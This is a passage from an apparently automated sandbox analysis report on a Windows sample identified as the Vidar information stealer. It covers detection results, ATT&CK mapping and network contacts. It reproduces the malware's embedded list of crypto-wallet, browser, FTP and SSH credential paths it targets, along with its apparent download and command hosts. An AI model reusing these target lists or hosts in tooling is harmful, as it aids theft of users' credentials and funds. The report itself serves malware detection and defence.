Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB90C40 sqlite3_bind_zeroblob,2_2_6CB90C40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB90D60 sqlite3_bind_parameter_name,2_2_6CB90D60
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB8EA0 sqlite3_clear_bindings,2_2_6CAB8EA0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6CB90B40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB6410 bind,WSAGetLastError,2_2_6CAB6410
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB60B0 listen,WSAGetLastError,2_2_6CAB60B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CABC030 sqlite3_bind_parameter_count,2_2_6CABC030
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB6070 PR_Listen,2_2_6CAB6070
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CABC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6CABC050
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA422D0 sqlite3_bind_blob,2_2_6CA422D0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB63C0 PR_Bind,2_2_6CAB63C0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          Registry Run Keys / Startup Folder                          		31
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                          Registry Run Keys / Startup Folder                          		3
                          Obfuscated Files or Information                          		Security Account Manager4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing                          		NTDS56
                          System Information Discovery                          		Distributed Component Object ModelInput Capture114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets251
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading                          		Cached Domain Credentials12
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                          Process Injection                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          System Owner/User Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539807 Sample: 7ZthFNAqYp.exe Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 26 t.me 2->26 28 steamcommunity.com 2->28 30 cowod.hopto.org 2->30 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 9 other signatures 2->44 7 7ZthFNAqYp.exe 1 2 2->7         started        signatures3 process4 file5 16 C:\Users\user\Music\...\AttoConvertVideo.exe, PE32 7->16 dropped 46 Detected unpacking (creates a PE file in dynamic memory) 7->46 48 Contains functionality to inject code into remote processes 7->48 50 Drops large PE files 7->50 52 2 other signatures 7->52 11 7ZthFNAqYp.exe 1 199 7->11         started        signatures6 process7 dnsIp8 32 t.me 149.154.167.99, 443, 49940 TELEGRAMRU United Kingdom 11->32 34 95.217.220.103, 443, 49989, 49990 HETZNER-ASDE Germany 11->34 36 2 other IPs or domains 11->36 18 C:\ProgramData\vcruntime140.dll, PE32 11->18 dropped 20 C:\ProgramData\softokn3.dll, PE32 11->20 dropped 22 C:\ProgramData\nss3.dll, PE32 11->22 dropped 24 3 other files (none is malicious) 11->24 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->54 56 Found many strings related to Crypto-Wallets (likely being stolen) 11->56 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->58 60 4 other signatures 11->60 file9 signatures10

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          7ZthFNAqYp.exe45%ReversingLabsWin32.Trojan.Generic
                          7ZthFNAqYp.exe44%VirustotalBrowse
                          7ZthFNAqYp.exe100%AviraTR/Redcap.xalcz

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe16%ReversingLabsWin32.Trojan.Generic

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          steamcommunity.com0%VirustotalBrowse
                          t.me0%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://player.vimeo.com0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          http://cowod.hopto.org0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          http://cowod.hopto.org_DEBUG.zip/c0%URL Reputationsafe
                          http://cowod.hopto.0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          http://cowod.hopto0%URL Reputationsafe
                          https://steam.tv/0%URL Reputationsafe
                          https://mozilla.org0/0%URL Reputationsafe
                          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://lv.queniujq.cn0%URL Reputationsafe
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%URL Reputationsafe
                          https://store.steampowered.com/;0%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
                          https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                          https://store.steampowered.com/stats/0%URL Reputationsafe
                          https://medal.tv0%URL Reputationsafe
                          https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                          https://store.steampowered.com/steam_refunds/0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          steamcommunity.com
                          		23.192.247.89
                          		truetrueunknown
                          t.me
                          		149.154.167.99
                          		truetrueunknown
                          cowod.hopto.org
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://95.217.220.103/freebl3.dlltrue
                              		unknown
                              https://95.217.220.103/nss3.dlltrue
                                		unknown
                                https://95.217.220.103/vcruntime140.dlltrue
                                  		unknown
                                  http://107.191.36.218/false
                                    		unknown
                                    https://95.217.220.103/mozglue.dlltrue
                                      		unknown
                                      https://t.me/fun88rockskektrue
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtab7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://player.vimeo.com7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://steamcommunity.com/login/home/?goto=profiles%2F7656119978660210776561199786602107[1].htm.2.drfalse
                                          		unknown
                                          https://duckduckgo.com/ac/?q=7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpfalse
